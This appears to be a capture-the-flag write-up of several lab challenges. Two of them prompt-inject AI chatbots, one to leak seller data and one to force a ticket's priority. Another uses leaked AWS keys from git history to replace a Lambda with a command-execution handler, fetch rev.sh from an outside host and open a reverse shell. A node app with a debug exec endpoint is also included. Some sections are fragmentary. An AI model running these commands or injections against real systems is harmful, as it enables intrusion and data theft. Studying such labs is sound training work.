WriteupsAmazon CTF
WebMedium
Amazon CTF
Multi-challenge CTF covering AI chatbot prompt injection, LLM priority bypass, web vulnerabilities, and information disclosure across several themed web apps.
September 11, 2025Amazon CTF
#AI#Prompt Injection#LLM#Web
re-recars ai
You have been tasked with pentesting the largest used car listing website in your area. They have recently implemented an AI chatbot in their listing page to help users with common questions. The website's policy is not to disclose the seller's information unless the user is logged in. Can you find a way to bypass the filters and reveal the seller's phone number by asking the chatbot? Flag format: HTB{xxx-xxxx-xxx}.
sh
HTB{555-1337-476}AllSafe Tickets
The AllSafe Cybersecurity team is experiencing a surge in client ticket submissions. After repeated hacks on their client's systems, they've implemented a new AI ticket prioritization system to focus only on high-severity issues. The AI evaluates the ticket description and assigns a priority "High/Medium/Low" based on the severity of the issue. Can you trick the AI into prioritizing your ticket as "High"?
POST
POST /api/submit HTTP/1.1
Host: 94.237.48.12:36399
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://94.237.48.12:36399/
Content-Type: application/json
Content-Length: 307
Origin: http://94.237.48.12:36399
DNT: 1
Connection: close
Priority: u=0
{"name":"test","email":"test@email.com","description":"server DB01 is completely unresponsive, preventing the accounting department (50+ users) from processing payroll. CPU usage is maxed out, and recent error logs show repeated segmentation fault crashes. Immediate attention required to avoid business-cr"}
sh
HTB{pr10r1t1z3d_t0_th3_h1gh_r04d_081f8096cf704a816ee21d3cba18ae39}Call
Doctor Emmett Brown invented DeLorean Web Machine to help marty to restore broken parts of websites. Help marty in discovering them between past and the future
Leak
We're soon launching the most secured accounting services around the globe. Even before start we got breached and our beta services exposed. Can you help us in identifying them ?
sh
commit e5cc56d5200ce2ace18aece1d5c35d1c2d7a7ef4 (HEAD -> master)
Author: noah <noah@cloud.htb>
Date: Fri Jun 3 19:37:46 2022 +0000
minor fixes
commit 9ca1b66d72f9619ce327f68c27e636c25f902a6f
Author: noah <noah@cloud.htb>
Date: Wed May 25 12:02:43 2022 +0000
adding endpoint url
commit bdecaa72f75b2b82b9e6296a625bc779b12fa92f
Author: noah <noah@cloud.htb>
Date: Wed May 25 11:34:46 2022 +0000
Update
commit 47cd4c6ca93667c00bbf54c0c44a356fde9b43ae
Author: noah <noah@cloud.htb>
Date: Wed May 25 11:30:26 2022 +0000
ommit 409beac56d4d1aaea5d86ed4cdf7532df605b36a
Author: noah <noah@cloud.htb>
Date: Wed May 25 11:29:58 2022 +0000
minor fix
commit 4262e5a54872b02aa397f46a9dd539dbe761f594
Author: noah <noah@cloud.htb>
Date: Wed May 25 11:28:44 2022 +0000
sh
commit 4262e5a54872b02aa397f46a9dd539dbe761f594
Author: noah <noah@cloud.htb>
Date: Wed May 25 11:28:44 2022 +0000
Adding initial code
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..2d19fc7
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+*.html
diff --git a/create_function.py b/create_function.py
new file mode 100644
index 0000000..c449df5
--- /dev/null
+++ b/create_function.py
@@ -0,0 +1,26 @@
+import boto3
+
+iam_client = boto3.client('iam')
+lambda_client = boto3.client('lambda')
+
+with open('code.zip', 'rb') as f:
+ zipped_code = f.read()
+
+role = iam_client.get_role(RoleName='LambdaBasicExecution')
+
+response = lambda_client.create_function(
+ FunctionName='accserv-dev',
+ Runtime='python3.8',
+ Role=role['Role']['Arn'],
+ Handler='lambda_function.lambda_handler',
+ Code=dict(ZipFile=zipped_code),
+ Timeout=300,
+ Environment={
+ 'Variables': {
+ 'Name': 'accserv-dev',
+ 'Environment': 'dev'
+ }
+ },
+)
+
+print(response)
sh
commit 409beac56d4d1aaea5d86ed4cdf7532df605b36a
Author: noah <noah@cloud.htb>
Date: Wed May 25 11:29:58 2022 +0000
minor fix
diff --git a/create_function.py b/create_function.py
index c449df5..9a44c6f 100644
--- a/create_function.py
+++ b/create_function.py
@@ -1,6 +1,6 @@
import boto3
-iam_client = boto3.client('iam')
+iam_client = boto3.client('iam',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
lambda_client = boto3.client('lambda')
with open('code.zip', 'rb') as f:sh
commit 47cd4c6ca93667c00bbf54c0c44a356fde9b43ae
Author: noah <noah@cloud.htb>
Date: Wed May 25 11:30:26 2022 +0000
update
diff --git a/create_function.py b/create_function.py
index 9a44c6f..c4f7b7e 100644
--- a/create_function.py
+++ b/create_function.py
@@ -1,7 +1,7 @@
import boto3
iam_client = boto3.client('iam',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
-lambda_client = boto3.client('lambda')
+lambda_client = boto3.client('lambda',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
with open('code.zip', 'rb') as f:
zipped_code = f.read()
sh
commit bdecaa72f75b2b82b9e6296a625bc779b12fa92f
Author: noah <noah@cloud.htb>
Date: Wed May 25 11:34:46 2022 +0000
Update
diff --git a/create_function.py b/create_function.py
index c4f7b7e..c4212b9 100644
--- a/create_function.py
+++ b/create_function.py
@@ -1,7 +1,10 @@
+import os
import boto3
-iam_client = boto3.client('iam',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
-lambda_client = boto3.client('lambda',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
+AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
+AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
+iam_client = boto3.client('iam',aws_access_key_id=AWS_ACCESS_KEY_ID,aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
+lambda_client = boto3.client('lambda',aws_access_key_id=AWS_ACCESS_KEY_ID,aws_secret_access_key=AWS_SECRET_ACCESS_KEY))
with open('code.zip', 'rb') as f:
zipped_code = f.read()
(END)
sh
commit 9ca1b66d72f9619ce327f68c27e636c25f902a6f
Author: noah <noah@cloud.htb>
Date: Wed May 25 12:02:43 2022 +0000
adding endpoint url
diff --git a/create_function.py b/create_function.py
index c4212b9..8068a62 100644
--- a/create_function.py
+++ b/create_function.py
@@ -3,8 +3,18 @@ import boto3
AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
-iam_client = boto3.client('iam',aws_access_key_id=AWS_ACCESS_KEY_ID,aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
-lambda_client = boto3.client('lambda',aws_access_key_id=AWS_ACCESS_KEY_ID,aws_secret_access_key=AWS_SECRET_ACCESS_KEY))
+iam_client = boto3.client(
+ 'iam',
+ aws_access_key_id=AWS_ACCESS_KEY_ID,
+ aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
+ endpoint_url=http://cloud.htb
+ )
+lambda_client = boto3.client(
+ 'lambda',
+ aws_access_key_id=AWS_ACCESS_KEY_ID,
+ aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
+ endpoint_url=http://cloud.htb
+ )
with open('code.zip', 'rb') as f:
zipped_code = f.read()
sh
commit e5cc56d5200ce2ace18aece1d5c35d1c2d7a7ef4 (HEAD -> master)
Author: noah <noah@cloud.htb>
Date: Fri Jun 3 19:37:46 2022 +0000
minor fixes
diff --git a/create_function.py b/create_function.py
index 8068a62..5046d9a 100644
--- a/create_function.py
+++ b/create_function.py
@@ -7,13 +7,15 @@ iam_client = boto3.client(
'iam',
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
- endpoint_url=http://cloud.htb
+ endpoint_url=http://cloud.htb,
+ region_name='us-east-2'
)
lambda_client = boto3.client(
'lambda',
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
- endpoint_url=http://cloud.htb
+ endpoint_url=http://cloud.htb,
+ region_name='us-east-2'
)
with open('code.zip', 'rb') as f:
sh
aws sts get-caller-identity --endpoint-url http://cloud.htb
{
"UserId": "AKIAC4G4H8J2K9K1L0M2",
"Account": "000000000000",
"Arn": "arn:aws:iam::000000000000:user/noah"
}sh
aws lambda get-function --function-name accserv-dev --endpoint-url http://cloud.htb 255 ↵
{
"Configuration": {
"FunctionName": "accserv-dev",
"FunctionArn": "arn:aws:lambda:us-east-2:000000000000:function:accserv-dev",
"Runtime": "python3.8",
"Role": "arn:aws:iam::123456789012:role/service-role/accserv-dev-role",
"Handler": "lambda_function.lambda_handler",
"CodeSize": 316,
"Description": "",
"Timeout": 3,
"LastModified": "2025-09-12T13:52:03.060+0000",
"CodeSha256": "qT8cXI/juUJTkc9Wxsr9Vc7M7mt+kqxz3axqi/32Dhk=",
"Version": "$LATEST",
"VpcConfig": {},
"TracingConfig": {
"Mode": "PassThrough"
},
"RevisionId": "f068a66b-36e6-4df9-a1c5-a3ca0b557ff6",
"State": "Active",
"LastUpdateStatus": "Successful",
"PackageType": "Zip"
},
"Code": {
"Location": "http://127.0.0.1:4566/2015-03-31/functions/accserv-dev/code"
},
"Tags": {}
}
sh
╭─root@parrot /home/sake/htb/amazon-ctf/leaak ‹master›
╰─# aws lambda invoke --function-name accserv-dev --endpoint-url http://cloud.htb output.txt
{
"StatusCode": 200,
"LogResult": "",
"ExecutedVersion": "$LATEST"
}
╭─root@parrot /home/sake/htb/amazon-ctf/leaak ‹master●›
╰─# cat output.txt
{"body":"\"Still in development\"","statusCode":200}
sh
aws lambda invoke --function-name accserv-dev --payload '{"cmd": "whoami"}' --endpoint-url http://cloud.htb output.txt
{
"StatusCode": 200,
"LogResult": "",
"ExecutedVersion": "$LATEST"
}sh
cat output.txt
{"body":"{\"stdout\": \"root\\n\", \"stderr\": \"\", \"exit_code\": 0}","statusCode":200}python
import json
import subprocess
def lambda_handler(event, context):
cmd = event.get("cmd")
if not cmd:
return {
"statusCode": 400,
"body": json.dumps("Missing cmd")
}
p = subprocess.Popen(
cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
stdout, stderr = p.communicate()
return {
"statusCode": 200,
"body": json.dumps({
"stdout": stdout.decode("utf-8"),
"stderr": stderr.decode("utf-8"),
"exit_code": p.returncode
})
}Then save it as code.zip.
sh
zip code.zip lambda_function.pysh
aws lambda update-function-code --function-name accserv-dev --zip-file fileb://code.zip --endpoint-url http://cloud.htbsh
aws lambda invoke --function-name accserv-dev --payload '{"cmd": "wget http://10.10.14.44/rev.sh"}' --endpoint-url http://cloud.htb output.txtsh
aws lambda invoke --function-name accserv-dev --payload '{"cmd": "chmod +x rev.sh"}' --endpoint-url http://cloud.htb output.txtsh
aws lambda invoke --function-name accserv-dev --payload '{"cmd": "bash rev.sh"}' --endpoint-url http://cloud.htb output.txtsh
rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.44] from (UNKNOWN) [10.129.200.31] 38718
sh: can't access tty; job control turned off
/tmp/localstack/zipfile.73799837 # ls
index.html
lambda_function.py
original_lambda_archive.zip
rev.sh
/tmp/localstack/zipfile.73799837 # whoami
rootsh
/opt # ls
code
flag.txtsh
/opt # cat flag.txt
HTB{Upd4t3s_4r3_n0t_n1c3_1n_l4mbd4s}cue
sh
aws sts get-caller-identity --endpoint-url http://cloud.htb 130 ↵
{
"UserId": "AKIAIOSFODNN7DXV3G29",
"Account": "000000000000",
"Arn": "arn:aws:iam::000000000000:user/will"
}
sh
aws dynamodb list-tables --endpoint-url http://cloud.htb
{
"TableNames": [
"users"
]
}sh
aws dynamodb scan --table-name users --endpoint-url http://cloud.htb
{
"Items": [
{
"password": {
"S": "GVzWqoBJS8MhhIjChbYbYRP2cjJpCdaCtkenR/uikgFvTA6EnExSKaMmB2BVB+4iVY1oNRu4kyX84e1D7NslBnWixT/96ErYV/wJ5dlcCyxM+/ZufVuZROCfbu/2MbQsyOooBMVst/8R+uI4BZqRB6tpii/zckIEe0y17OslNgVqtMwURmC6ZdsK2VuZlUYmdDho7Klom2tZtFwcZGDRDCDcSN2mpvfFMebwRae6RszlwM0Q1zOhFYSwEV27jr3a4q6Ezt1o76opslVVApx4cCeqz0UdkD80ZPSZGMtIXZCuCaaz4TiJGYJaCWIfj5s19HRltWQSHengHtkstGv82Ql+istjBypbOevqoHUS6jPBOsUsajm8ujZ/lWhYC5TclQ75IoHGmNqRMvb24lMc+zY7S/37VsvTv2D6fr9Ccr/JCelqt9zn4N2v3zCwKqYY0YwD3ErU/NZwd29uom2oVf2FW+bgLxfQLX9Myy/KGAihkUYqONPXHHJBI60RHmDyhFfua/dUvMWQl5dshu1WQ2M7MpaaXOlIbJCF98N6vz2WB6qh1f05McdzqmoISRQ5bFGHH1dX5pVd1g/QJSvuD1CnLAuPlq/gjRw4SfTdRJgM5Ka9F62UGwR8OZnm26TsuNXKOKERDuZ9yByupm5whx9l0UOhPUHMbkTB4PivDaQ="
},
"username": {
"S": "wesley"
}
}
],
"Count": 1,
"ScannedCount": 1,
"ConsumedCapacity": null
sh
echo -n dUZa8hmAL4cd8KJT42JpKQX/JqY1Dm7NTwZNDQ2VJj/NJieWtp0G0DsU+M/FnFvWUAI38qBDCceUctmV/maMCNNzLzHzD+0WZoyZ4XvEnbJXfHbY9XiVCLVXiShU8E+LJC81XxXKasKz4JxdFzeDC8ANlFTnn2WYfO8GcwgnoqVhAfniinVTZgh5OY6JgycvvjV0nHqoc/N9L40LxM0dRCHIsYlsJMYJq9Dp/u6EkSeAaHlhlZxakp//I8pyJTa3AwzRgqJkUowSEac6b6vmvc/9pkQxvHhqxrrzM6JFQEPQq1BrHJy83jy1F5X2BU/aWknPoYY6Y2m8FRtN2c4V2ZWnBI5GNfTWn7WPysCy5q7LtD+XiMs0uEz0OUnnK/2JDZZB2l8rDxO4nDsBw426PJg6a8CMW90dmFnHVLdGtyjc2LFq3gsF5QhhH6j+xH8vCWU4L+BTj17C3G4CK0Uho4V5JK6Pc/PtkyHtKXTXvuxE2z7j2tNOn0zOdWaK6tQWizUjC7Yea2CrEFm+H6EE2q2HgUTj6WPL2NMdwgqfQdE/N0L1HjpVJgu/kudSjHQoPDPLGMmg16BuuKh1p3i6tVfjWe3GlsJc278s1TpFXht1+6yDeVpvC7nPddJ5Ik9gQGh1OrQS9mLyOfqPFDUquoHN5YlwSkqm0aKGIXLhmXU= | base64 -d > cipher.binsh
-os.environ['AWS_ACCESS_KEY_ID'] = 'AKIA5M34BDN8GCJGRFFB'
-os.environ['AWS_SECRET_ACCESS_KEY'] = 'cLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5'sh
aws kms list-keys --endpoint-url http://cloud.htb --region us-east-1 130 ↵
{
"Keys": [
{
"KeyId": "01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e"
},
{
"KeyId": "36fbc89c-6400-4b7c-a18e-1da7eec68a8a",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/36fbc89c-6400-4b7c-a18e-1da7eec68a8a"
},
{
"KeyId": "60529d79-c3ea-44fb-92d4-53aca4c52c2f",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/60529d79-c3ea-44fb-92d4-53aca4c52c2f"
},
{
"KeyId": "61e74571-a6d7-4602-96d0-8f9d136df6e4",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/61e74571-a6d7-4602-96d0-8f9d136df6e4"
},
{
"KeyId": "716c151a-4d72-46a4-aef9-b12664097cf9",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/716c151a-4d72-46a4-aef9-b12664097cf9"
},
{
"KeyId": "7c479200-d49c-4f09-9689-a952489f62fa",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/7c479200-d49c-4f09-9689-a952489f62fa"
},
{
"KeyId": "836a07d5-8d8b-48b0-8a9b-9e6f7b3af60d",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/836a07d5-8d8b-48b0-8a9b-9e6f7b3af60d"
},
{
"KeyId": "b27135eb-3041-4d4d-ae05-7cdac8b04a01",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/b27135eb-3041-4d4d-ae05-7cdac8b04a01"
},
{
"KeyId": ""d40174d2-5442-4cd8-b115-2a3736ca597c"",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/d40174d2-5442-4cd8-b115-2a3736ca597c"
},
{
"KeyId": "ddb99800-4d53-456b-a983-8ad1b653d96e",
"KeyArn": "arn:aws:kms:us-east-1:000000000000:key/ddb99800-4d53-456b-a983-8ad1b653d96e"
}
]
}sh
for key in \
01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e \
36fbc89c-6400-4b7c-a18e-1da7eec68a8a \
60529d79-c3ea-44fb-92d4-53aca4c52c2f \
716c151a-4d72-46a4-aef9-b12664097cf9 \
7c479200-d49c-4f09-9689-a952489f62fa
do
aws kms decrypt \
--ciphertext-blob fileb://ciphertext.bin \
--key-id $key \
--endpoint-url http://cloud.htb \
--region us-east-1 \
--output text \
--query Plaintext | base64 -d 2>/dev/null && echo "Decrypted with key $key" && break
done
An error occurred (InvalidCiphertextException) when calling the Decrypt operation:
Decrypted with key 01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e
An error occurred (501) when calling the ListGrants operation: Passed X-Amz-Target (TrentService.ListGrants) is not implemented
=== KEY d40174d2-5442-4cd8-b115-2a3736ca597c ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "d40174d2-5442-4cd8-b115-2a3736ca597c",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/d40174d2-5442-4cd8-b115-2a3736ca597c",
"CreationDate": 1624355046,
"Enabled": true,
"Description": "test key 123",
"KeyUsage": "ENCRYPT_DECRYPT",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
"EncryptionAlgorithms": [
"SYMMETRIC_DEFAULT"
]
}
}
--- policies ---
An error occurred (501) when calling the ListKeyPolicies operation: Passed X-Amz-Target (TrentService.ListKeyPolicies) is not implemented
{
"Policy": "policy1"
}
--- grants ---
sh
for key in \
01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e \
36fbc89c-6400-4b7c-a18e-1da7eec68a8a \
60529d79-c3ea-44fb-92d4-53aca4c52c2f \
716c151a-4d72-46a4-aef9-b12664097cf9 \
7c479200-d49c-4f09-9689-a952489f62fa
do
aws kms decrypt \
--ciphertext-blob fileb://ciphertext.bin \
--key-id $key \
--endpoint-url http://cloud.htb \
--region us-east-1 \
--output text \
--query Plaintext | base64 -d 2>/dev/null && echo "Decrypted with key $key" && break
done
An error occurred (InvalidCiphertextException) when calling the Decrypt operation:
Decrypted with key 01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e
sh
for key_id in 120350aa-6b5a-4565-bfd2-020f410afe50 3849657b-3e11-4105-8eea-565e5113c444 43b5b1ea-9517-4c38-b399-c1be9a2458d2 7e70a32c-b383-4c59-be2c-2825ab25f7d3 94323941-4b22-4038-b9c3-4a9c072df027 aa0fa588-9739-4cf2-b822-506368268832 b2374455-700a-4945-94c8-59b92fcc746b cebde087-568f-49cc-b1ea-bb591bf1922c d40174d2-5442-4cd8-b115-2a3736ca597c e7c264a6-c849-40e2-9f46-70f54cfa4016; do
echo "=== Describing Key: $key_id ==="
aws kms describe-key --key-id $key_id --endpoint-url http://cloud.htb
echo -e "\n"
done
=== Describing Key: 120350aa-6b5a-4565-bfd2-020f410afe50 ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "120350aa-6b5a-4565-bfd2-020f410afe50",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/120350aa-6b5a-4565-bfd2-020f410afe50",
"CreationDate": 1757696308,
"Enabled": true,
"KeyUsage": "ENCRYPT_DECRYPT",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
"EncryptionAlgorithms": [
"SYMMETRIC_DEFAULT"
]
}
}
=== Describing Key: 3849657b-3e11-4105-8eea-565e5113c444 ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "3849657b-3e11-4105-8eea-565e5113c444",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/3849657b-3e11-4105-8eea-565e5113c444",
"CreationDate": 1757696317,
"Enabled": true,
"KeyUsage": "SIGN_VERIFY",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "RSA_4096",
"SigningAlgorithms": [
"RSASSA_PSS_SHA_256",
"RSASSA_PSS_SHA_384",
"RSASSA_PSS_SHA_512",
"RSASSA_PKCS1_V1_5_SHA_256",
"RSASSA_PKCS1_V1_5_SHA_384",
"RSASSA_PKCS1_V1_5_SHA_512"
]
}
}
=== Describing Key: 43b5b1ea-9517-4c38-b399-c1be9a2458d2 ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "43b5b1ea-9517-4c38-b399-c1be9a2458d2",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/43b5b1ea-9517-4c38-b399-c1be9a2458d2",
"CreationDate": 1757696304,
"Enabled": true,
"KeyUsage": "ENCRYPT_DECRYPT",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
"EncryptionAlgorithms": [
"SYMMETRIC_DEFAULT"
]
}
}
=== Describing Key: 7e70a32c-b383-4c59-be2c-2825ab25f7d3 ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "7e70a32c-b383-4c59-be2c-2825ab25f7d3",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/7e70a32c-b383-4c59-be2c-2825ab25f7d3",
"CreationDate": 1757696308,
"Enabled": true,
"KeyUsage": "ENCRYPT_DECRYPT",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "RSA_4096",
"EncryptionAlgorithms": [
"RSAES_OAEP_SHA_1",
"RSAES_OAEP_SHA_256"
]
}
}
=== Describing Key: 94323941-4b22-4038-b9c3-4a9c072df027 ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "94323941-4b22-4038-b9c3-4a9c072df027",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/94323941-4b22-4038-b9c3-4a9c072df027",
"CreationDate": 1757696305,
"Enabled": true,
"KeyUsage": "SIGN_VERIFY",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "RSA_4096",
"SigningAlgorithms": [
"RSASSA_PSS_SHA_256",
"RSASSA_PSS_SHA_384",
"RSASSA_PSS_SHA_512",
"RSASSA_PKCS1_V1_5_SHA_256",
"RSASSA_PKCS1_V1_5_SHA_384",
"RSASSA_PKCS1_V1_5_SHA_512"
]
}
}
=== Describing Key: aa0fa588-9739-4cf2-b822-506368268832 ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "aa0fa588-9739-4cf2-b822-506368268832",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/aa0fa588-9739-4cf2-b822-506368268832",
"CreationDate": 1757696311,
"Enabled": true,
"KeyUsage": "SIGN_VERIFY",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "RSA_4096",
"SigningAlgorithms": [
"RSASSA_PSS_SHA_256",
"RSASSA_PSS_SHA_384",
"RSASSA_PSS_SHA_512",
"RSASSA_PKCS1_V1_5_SHA_256",
"RSASSA_PKCS1_V1_5_SHA_384",
"RSASSA_PKCS1_V1_5_SHA_512"
]
}
}
=== Describing Key: b2374455-700a-4945-94c8-59b92fcc746b ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "b2374455-700a-4945-94c8-59b92fcc746b",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/b2374455-700a-4945-94c8-59b92fcc746b",
"CreationDate": 1757696304,
"Enabled": true,
"KeyUsage": "ENCRYPT_DECRYPT",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
"EncryptionAlgorithms": [
"SYMMETRIC_DEFAULT"
]
}
}
=== Describing Key: cebde087-568f-49cc-b1ea-bb591bf1922c ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "cebde087-568f-49cc-b1ea-bb591bf1922c",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/cebde087-568f-49cc-b1ea-bb591bf1922c",
"CreationDate": 1757696304,
"Enabled": true,
"KeyUsage": "ENCRYPT_DECRYPT",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
"EncryptionAlgorithms": [
"SYMMETRIC_DEFAULT"
]
}
}
=== Describing Key: d40174d2-5442-4cd8-b115-2a3736ca597c ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "d40174d2-5442-4cd8-b115-2a3736ca597c",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/d40174d2-5442-4cd8-b115-2a3736ca597c",
"CreationDate": 1624355046,
"Enabled": true,
"Description": "test key 123",
"KeyUsage": "ENCRYPT_DECRYPT",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
"EncryptionAlgorithms": [
"SYMMETRIC_DEFAULT"
]
}
}
=== Describing Key: e7c264a6-c849-40e2-9f46-70f54cfa4016 ===
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "e7c264a6-c849-40e2-9f46-70f54cfa4016",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/e7c264a6-c849-40e2-9f46-70f54cfa4016",
"CreationDate": 1757696308,
"Enabled": true,
"KeyUsage": "ENCRYPT_DECRYPT",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
"EncryptionAlgorithms": [
"SYMMETRIC_DEFAULT"
]
}
sh
aws kms get-key-policy --key-id d40174d2-5442-4cd8-b115-2a3736ca597c --policy-name default --endpoint-url http://cloud.htb
{
"Policy": "policy1"
}
sh
aws kms create-key --endpoint-url http://cloud.htb --description "Test decryption key" --key-usage ENCRYPT_DECRYPT 255 ↵
{
"KeyMetadata": {
"AWSAccountId": "000000000000",
"KeyId": "77c8e031-6c1b-4779-a5ef-3e30de063c05",
"Arn": "arn:aws:kms:us-east-1:000000000000:key/77c8e031-6c1b-4779-a5ef-3e30de063c05",
"CreationDate": 1757713243,
"Enabled": true,
"Description": "Test decryption key",
"KeyUsage": "ENCRYPT_DECRYPT",
"KeyState": "Enabled",
"Origin": "AWS_KMS",
"KeyManager": "CUSTOMER",
"CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
"EncryptionAlgorithms": [
"SYMMETRIC_DEFAULT"
]
}
}
CatchEmAll
Your one-stop resource to find which city you can find your favorite pokemon to catch on! Go catch 'em all! Note: The remote instance might take a few minutes to spawn. Please be patient.
sh
cat index.js 127 ↵
const express = require('express');
const { execSync } = require('child_process');
const router = express.Router({caseSensitive: true});
const isLocalhost = req => ((req.ip == '127.0.0.1' && req.headers.host == '127.0.0.1:1337') ? 0 : 1);
const response = data => ({ message: data });
let db;
router.get('/', (req, res) => {
return res.render('index.html');
});
router.post('/api/catch', async (req, res) => {
const { pokemon } = req.body;
if (pokemon) {
return db.whereToCatch(pokemon)
.then(rows => {
return res.json(rows);
})
.catch(e => {
console.log(e);
return res.status(500).send(response(e.toString()));
})
}
return res.status(500).send(response('Missing parameters!'));
});
router.get('/debug', async (req, res) => {
if (!isLocalhost(req)) return res.status(500).send('Debugging is disallowed public access');
const { cmd, secret } = req.query;
if (! secret === process.env.DEBUG_SECRET ) return res.status(500).send('Unauthorized');
if (cmd) {
try {
const cmdExec = execSync(cmd);
return res.json({cmd, output: cmdExec.toString()});
}
catch (e) {
return res.json({cmd, output: e.stderr.toString()});
}
}
return res.status(500).send(response('Missing required parameters'));
});
module.exports = (database) => {
db = database;
return router;
}# 
sh
HTB{0n3_1nj3c710n_t0_c4tch_3m_4ll!_027f1f382710e5960f04c6803edc6796}sh
html
<!DOCTYPE html><html><head>
<meta charset="utf-8">
</head>
<body>
